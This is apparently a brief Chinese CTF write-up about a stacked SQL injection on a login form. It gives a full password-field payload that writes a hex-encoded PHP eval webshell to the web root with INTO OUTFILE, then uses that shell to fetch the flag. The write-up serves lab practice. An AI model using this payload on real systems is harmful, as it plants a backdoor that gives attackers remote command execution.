堆叠注入写Shell

2026/5/15 题解 SQL注入 Webshell

打开是一个登录界面

堆叠注入写Shell_efc21db4

这里尝试写一个木马进去，把木马进行hex编码进行绕过

username=admin\

password=;select 0x3c3f706870206576616c28245f504f53545b636d645d293b3f3e into outfile “/var/www/html/1.php”;%23

堆叠注入写Shell_5fefa39a

上传完之后尝试使用木马获得flag

堆叠注入写Shell_4d813d7f

CTF{sql_injection_is_fun}

LOADING